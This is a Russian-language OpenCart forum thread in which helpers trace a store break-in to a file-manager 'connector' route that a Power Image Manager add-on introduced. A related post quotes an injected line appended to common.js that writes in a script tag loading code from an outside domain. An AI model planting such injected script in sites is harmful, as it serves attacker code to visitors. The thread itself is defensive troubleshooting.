Jump to content

Recommended Posts

Ребят выручайте, подскажите что делать? Уже 2 раза за пол часа взломали сайт на опенкарт 1.5.6.4. В этот момент находился на сайте, усиленно пользовался файловым менеджером Power Image Manager

Share this post


Link to post
Share on other sites

Логи посещений сервера смотрите (пришлите).

Share this post


Link to post
Share on other sites

 

А что именно делают? Откуда русский 1.5.6.4 качали? 

Share this post


Link to post
Share on other sites

А что именно делают? Откуда русский 1.5.6.4 качали? 

Убивают шаблон, русский качал с сайта

Share this post


Link to post
Share on other sites

А что именно делают? Откуда русский 1.5.6.4 качали? 

Кстати, Ваша фотография на сайте :-)

Share this post


Link to post
Share on other sites

Кстати, Ваша фотография на сайте :-)

 

Да, это мой блог и перевод тоже мой. :oops:

В файле admin/controller/filemanager.php есть функция connector? Если есть, то пришлите код функции или лучше файл полностью. Если же такой функции нет, то вы ее не видите))

Share this post


Link to post
Share on other sites

Контрольные суммы файлов переводов на сервере перепроверил - с переводами все в порядке. 

Share this post


Link to post
Share on other sites

Контрольные суммы файлов переводов на сервере перепроверил - с переводами все в порядке. 

Может admin/controller/common/filemanager.php

Share this post


Link to post
Share on other sites

Может admin/controller/common/filemanager.php

 

Да, именно он. Извиняюсь.

Share this post


Link to post
Share on other sites

Бывает :-)

 

:| Файл ничем не отличается от оригинала. Возможно в vqmod/xml есть модули, которые добавляют функцию connector? Пришлите xml файлы или найдите сами файл, который изменяет admin/controller/common/filemanager.php/. Потому что в логах видно, что вход с другого ip идет именно через admin/index.php?route=common/filemanager/connector. Да, и странно, что этой функции в оригинальном файле нет.

Share this post


Link to post
Share on other sites

:| Файл ничем не отличается от оригинала. Возможно в vqmod/xml есть модули, которые добавляют функцию connector? Пришлите xml файлы или найдите сами файл, который изменяет admin/controller/common/filemanager.php/. Потому что в логах видно, что вход с другого ip идет именно через admin/index.php?route=common/filemanager/connector. Да, и странно, что этой функции в оригинальном файле нет.

Вот архив с папкой vqmod

Share this post


Link to post
Share on other sites

Но есть библиотека elfinder  в system/library

Share this post


Link to post
Share on other sites

 

Функция connector добавляется файлом vqmod_PowerImageManager.xml. Насколько я смог понять эта функция всего лишь запрашивает дерево файлов и папок. а IP адреса видимо перепутал. Сомневаюсь, что ElFinder в этом виноват. Но на всякий случай рекомендую временно отказаться от этого модуля. Просто переименуйте расширение xml файла на что-нибудь другое. Если взломы прекратятся, то дело именно в нем. Сейчас ничем помочь не могу, пора спать.

Share this post


Link to post
Share on other sites

Функция connector добавляется файлом vqmod_PowerImageManager.xml. Насколько я смог понять эта функция всего лишь запрашивает дерево файлов и папок. а IP адреса видимо перепутал. Сомневаюсь, что ElFinder в этом виноват. Но на всякий случай рекомендую временно отказаться от этого модуля. Просто переименуйте расширение xml файла на что-нибудь другое. Если взломы прекратятся, то дело именно в нем. Сейчас ничем помочь не могу, пора спать.

Спасибо большое, как с вами можно связаться (электронная почта, соц. сети)?

Share this post


Link to post
Share on other sites

Спасибо большое, как с вами можно связаться (электронная почта, соц. сети)?

 

talgatks@gmail.com отвечать на вопросы смогу не часто, помогать - еще реже, т.к. заканчиваю практиковать на время учебы. Либо на этом форуме. Я здесь почти каждый день, кроме выходных.

Share this post


Link to post
Share on other sites

Не пользуйтесь загрузкой файлов на сервер из фронта, в этом может быть виноват даже не модуль, а хостер

 

Почитайте здесь

Share this post


Link to post
Share on other sites

Спасибо большое, как с вами можно связаться (электронная почта, соц. сети)?

Поищите сервисом http://virusdie.ru - он и удалить вам вирусы и их причины автоматически сможет.

Я уже писал обзор о нем тут.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Similar Content

    • By ArtemPitov
      Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью!
       

       
      Модуль умеет :
      Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов  Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута)  
      В планах:
      Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа  Добавить возможность задавать ссылку для переадресации   
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.  
      Тип распространения:
      as is (как есть)  
      Установка:
      Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha"  Важно! Если у вас переименованная папка admin модуль не будет работать  
    • By ArtemPitov
      498.00 руб
      Скачать/Купить дополнение


      Защита от вирусов и хакеров
       
      Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью!
       

       
      Модуль умеет :
      Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов  Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута)  
      В планах:
      Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа  Добавить возможность задавать ссылку для переадресации   
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.  
      Тип распространения:
      as is (как есть)  
      Установка:
      Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha"  Важно! Если у вас переименованная папка admin модуль не будет работать  
      Добавил ArtemPitov Добавлено 14.01.2018 Категория Модули Системные требования PHP 5.4 и выше Сайт разработчика https://pitov.pro Старая цена 1190 Метод активации Без активации Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1
      2.0 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Opencart.pro 2.3
      Opencart.pro 2.1
      OcShop 2.0.3.х
      Не проверялось Обращение к серверу разработчика  
    • By IIIBarsik
      Старый сайт:
      OcStore 1.5 
      Тема стандартная (defaut) 
       
      Сегодня зашел на него, а он грузится почти минуту. Полез смотреть в начале через chrome, что увидел: 
      что то такое (картинка из инета)

      В хидере под тегом <head> был скрипт с ссылкой на на данный ресурс. 
      Побежал в header.tpl (catalog\view\theme\default\template\common) увидел там такую вещь: 
      <?php foreach ($scripts as $script) { ?> <script type="text/javascript" src="<?php echo $script; ?>"></script> <?php } ?> Понимаю, что данная херота может инклудится вот сюда из любого файла
      Нашел ее довольно быстро, а именно в catalog\view\javascript\common.js
      В конце файла была приписка:
      document.write('<script src="https://afrodizinlife.gq"><\x2fscript>'); Собственно вопрос:
      Как такие вещи вообще происходят на opencart?
      P.S. По поводу паролей можно не писать: 
      1. 10 значные с спецсимволами + регистры
      2. В браузере не храню
      3. В FileZilla тоже не храню
      Я, конечно, понимаю, что все зависит от определенной сборки, шаблона и установленного на сайт, но есть ли основные дыры, которые необходимо латать? 
      Или какие то минимумы, что необходимо сделать всем и вся? 
    • By Kompanetsr
      Добрый день!
       
      Ребят, кто понимает, в чем может быть проблема?
      Вы не могли бы взглянуть на сайт, либо взлом, либо проблема с шаблоном... Перед этим всем в карточках товара вылазила ошибка 500
      Пробовали делать Бэк-ап, но на следующий день снова имеем то, что имеем (кривую главную страницу и всё)
      mnogo-mozaiki.ru
       
      Для удобства и быстроты связи можете писать в вотсап 89150803060 Роман
    • By mirek
      498.00 руб
      Скачать/Купить дополнение


      Двух факторная Google авторизация для админ панели
      Модуль позволяет обезопасить ваш интернет-магазин на базе OpenCart 2.х от не санкционированного доступа Обеспечивает надежную защиту административной части магазина. Даже в том случае если злоумышленник получил логин и пароль от админ панели Вашего магазина  - он не сможет войти! Модуль активирует вход в админ панель магазина используя двух факторную Google авторизацию!

       
      Коды доступа меняются с интервалом в 30 секунд!
       
      Для использования двух факторной Google авторизации Вам необходимо также скачать и установить на свое мобильное устройство
      приложение Google Authenticator!  Коды доступа генерируются в приложении Google Authenticator Их необходимо вводить в форму авторизации
      на Вашем сайте

      Приложение Google Authenticator Вы можете найти и скачать в Play Market на своем мобильном устройстве!

      Внимание! При использовании двух факторной Google авторизации имейте ввиду возможную рассинхронизацию времени 
      между времененм на хостинге на котором работает Ваш сайт и временем на мобильном устройстве которое Вы используете
      для получения кодов для прохождения двух факторной Google авторизации

      Код полученный на Вашем устройстве подходит только в то время которое показывает Ваше мобильное устройство! 
       
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.
       Тип распространения:
      as is (как есть)  
      Установка:
      Для установки модуля users2fa Вам необходимо в административной панели Вашего сайта в Разделе Дополнения -> Установка дополнений
      загрузить zip архив с модулем После того как модуль установится можно перейти в подраздел Дополнения -> Менеджер дополнений и обновить кеш (иконка в правом верхнем углу) После установки в настройках пользователей админ панели появится пункт "Использовать 2fa google авторизацию" Добавил mirek Добавлено 02.04.2018 Категория Модули Системные требования Сайт разработчика http://hgroup.pp.ua Старая цена Метод активации Без активации Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1
      2.0 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Не проверялось  
  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.